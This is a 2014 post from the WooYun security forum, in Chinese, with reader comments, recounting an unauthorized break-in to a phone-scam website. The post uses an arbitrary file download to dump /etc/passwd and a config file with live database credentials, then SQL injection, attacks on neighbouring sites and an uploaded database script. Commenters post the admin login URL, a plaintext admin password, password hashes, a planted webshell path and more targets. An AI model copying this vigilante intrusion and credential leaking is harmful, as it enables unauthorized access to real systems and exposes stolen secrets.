当前位置:WooYun(白帽子技术社区) >> 内容分享区 >> 揭秘道哥的黑板报里那个骗子网站

揭秘道哥的黑板报里那个骗子网站

破落日 | 2014-07-08 00:29

今晚道哥的黑板报的推送了一篇【同事亲历的一次电话诈骗】,挺有意思,没看过的同学可以看看涨姿势。

链接:点我!

里面附带了骗子的网址:http://sppcn010952110.com

那就来看看吧。

一看界面,煞有解释,应该是直接把官方的抓取过来了,但是左右两个链接异常可疑
1.jpg

左边的东西下载下来是一个Teamviewer。。。擦,远控啊= =,连图标也不改
2.jpg

仔细瞅瞅这链接:http://sppcn010952110.com/downloadfile.php?file=check.exe
果断任意文件下载:
得到一些儿信息
nobody:x:99:99:Nobody:/:/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32009:32010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:498:498:MySQL server:/var/lib/mysql:/bin/bash
sppcncom:x:837:838::/home/sppcncom:/usr/local/cpanel/bin/noshell


<?    
$web_url = $_SERVER['PHP_SELF'];
$web_url = strrchr($web_url,"/");
$web_url = str_replace("/","",$web_url);
$web_domain = $_SERVER["HTTP_HOST"];
$host_url = "http://" . $web_domain;
//sppcntwd
$mysql_host_port = 'localhost:3306';
$mysql_user = 'sppcncom_a1';
$db_name = 'sppcncom_1';
$mysql_password = '2aqlpswko';


$connection = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");
$link = mysql_connect($mysql_host_port,$mysql_user,$mysql_password) or die("Could not connect");

$serverset = "character_set_connection='utf8', character_set_results='utf8', character_set_client='binary'";
mysql_query("SET $serverset");
mysql_select_db("$db_name") or die("Could not select database");

  
mysql_set_charset('utf8', $connection);

?>


再看看右边的,应该是查通缉令那个系统了:
3.jpg

随便输入个引号:
4.jpg
恩。。注入

然后。。然后按照常理来说是扫扫后台吧。。。
恩。。扫不到。。= =
然后就旁注吧
5.jpg
台湾友人的站,罪过罪过。。。

随便看了一个站,看到是蛋疼的linuxLinux sp18.g-dns.com 2.6.32-458.23.2.lve1.2.52.el6.x86_64 #1 SMP Mon Feb 3 06:07:54 EST 2014 x86_64(besttaiw)

结果找不到网站目录啊。。。估计是虚拟主机,我也懒得提权了。
最后丢了一个脚本上去看看数据库里都有啥
6.jpg
这目测是钓鱼钓到的?看来已经有前辈日过了吧。。
7.jpg

这是后台的用户密码,扫到地址的同学可以登录上去玩玩~
8.jpg

我就看到这儿了,大家继续吧。。。
9.jpg

分享到:
  1. 1#
    回复此人 感谢
    博丽灵梦 (啊 我中枪了) | 2014-07-08 00:56

    删掉所有信息 为民除害吧

  2. 2#
    回复此人 感谢
    骚动侠 (专业灌水五十年) | 2014-07-08 00:56

    http://sppcn010952110.com/manage/login.php

  3. 3#
    回复此人 感谢
    骚动侠 (专业灌水五十年) | 2014-07-08 01:10

    +----------------------------------+-----------+
    | password                         | user_name |
    +----------------------------------+-----------+
    | b5d751ef310e921f696bd4033c4a18ed | 管理者    |
    | 5416d7cd6ef195a0f7622a9c56b55e84 | system    |
    +----------------------------------+-----------+

  4. 4#
    回复此人 感谢
    随随意意 (RedFreever007pyphrb的徒弟) | 2014-07-08 01:18

    从来不相信这些的,有些电话诈骗挺真,这个确实。。。太奇葩了!

  5. 5#
    回复此人 感谢
    Ricter (勿忘初心 (๑`・ᴗ・´๑) | 2014-07-08 07:36

    /home/sppcncom/public_html/

  6. 6#
    回复此人 感谢
    国士无双 (我来找快乐。) | 2014-07-08 09:19

    7. 如果你碰到一个十分高效的ZF机关,多半是骗子

  7. 7#
    回复此人 感谢
    Croxy | 2014-07-08 09:20

    7. 如果你碰到一个十分高效的ZF机关,多半是骗子

  8. 8#
    回复此人 感谢
    Jumbo (www.chinabaiker.com) | 2014-07-08 09:23

    "最后丢了一个脚本上去看看数据库里都有啥 "啥子脚本

  9. 9#
    回复此人 感谢
    Ki11 (;̷̸̨̀͒̏̃ͦ̈́̾̀́̎͢҉͚̼͉ͨͬͪ͗̇̑) | 2014-07-08 09:23

    已经被删了...

  10. 10#
    回复此人 感谢
    小胖子 (z7y首席代言人,园长的表哥...) | 2014-07-08 09:35

    7. 如果你碰到一个十分高效的ZF机关,多半是骗子

  11. 11#
    回复此人 感谢
    El4pse | 2014-07-08 09:53

    @Jumbo adminer

  12. 12#
    回复此人 感谢
    Comer | 2014-07-08 11:14

    嗯,昨晚上去看了眼~~今天早上也接到冒充招商的电话了...

  13. 13#
    回复此人 感谢
    Cyrils | 2014-07-08 11:33

    7. 如果你碰到一个十分高效的ZF机关,多半是骗子

  14. 14#
    回复此人 感谢
    Ricter (勿忘初心 (๑`・ᴗ・´๑) | 2014-07-08 11:58

    @Ki11 我滲透完給刪了..

  15. 15#
    回复此人 感谢
    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2014-07-08 12:02

    干的好,已打赏1WB。

  16. 16#
    回复此人 感谢
    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2014-07-08 12:07

    http://sppgov.net/
    http://142.4.54.215/

  17. 17#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2014-07-08 12:17

    打赏

  18. 18#
    回复此人 感谢
    Finger (Save water. Shower with your girlfriend.) | 2014-07-08 13:12

    其中的电话号码伪造是很容易的,手机app+有网络即可,我通常是用18188889999给别人打电话的

  19. 19#
    回复此人 感谢
    傻逼 (我是傻逼) | 2014-07-08 14:27

    7. 如果你碰到一个十分高效的ZF机关,多半是骗子

  20. 20#
    回复此人 感谢
    HackPanda | 2014-07-09 13:30

    http://sppgov.net/test.php 不是我干的...

  21. 21#
    回复此人 感谢
    LauRen (不登高山,不知天之高也;不临深溪,不知地之厚也。) | 2014-07-09 14:01

    @Finger 求姿势

  22. 22#
    回复此人 感谢
    cooFool (没有关系,我只是来看海。) | 2014-07-10 12:27

    被删了。

  23. 23#
    回复此人 感谢
    冷冷的夜 (1) | 2014-07-10 12:57

    这网站是偷了检察员的代码

  24. 24#
    回复此人 感谢
    冷冷的夜 (1) | 2014-07-10 13:02

    sorry ,看错了

  25. 25#
    回复此人 感谢
    j2ck3r (我家里人什么都不知道。) | 2014-07-10 13:16

    http://sppcn010952110.com/manage/main.php  帐号:admin  密码:333aaa
    w1.jpg
    w2.jpg
    传了一下小马的地址
    http://sppcn010952110.com/up.php

  26. 26#
    回复此人 感谢
    j2ck3r (我家里人什么都不知道。) | 2014-07-10 13:19

    w3.jpg

  27. 27#
    回复此人 感谢
    梧桐雨 (‮ofni.uygnotuw‮) | 2014-07-10 13:59

    不错,加精了。

  28. 28#
    回复此人 感谢
    TellYouThat | 2014-07-11 15:20

    @Finger 同求姿势

  29. 29#
    回复此人 感谢
    Neeke | 2014-07-14 10:32

    @Finger 同求姿势

  30. 30#
    回复此人 感谢
    SpookZanG | 2014-07-18 09:12

    @Finger 同求姿势

  31. 31#
    回复此人 感谢
    陌路 | 2014-07-18 09:23

    这样的网站已被撸了好几个了。前段时间搞了套一样的程序 一样的诈骗手法,一帮人。不过这些人都在国外。

  32. 32#
    回复此人 感谢
    陌路 | 2014-07-18 09:37

    此建站人是台湾人,而且是个小黑客,建的这些网站仿真度很高。很多人受害人都轻信的是那些带照片的通缉令,他们诈骗的都在国外逍遥法外。

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录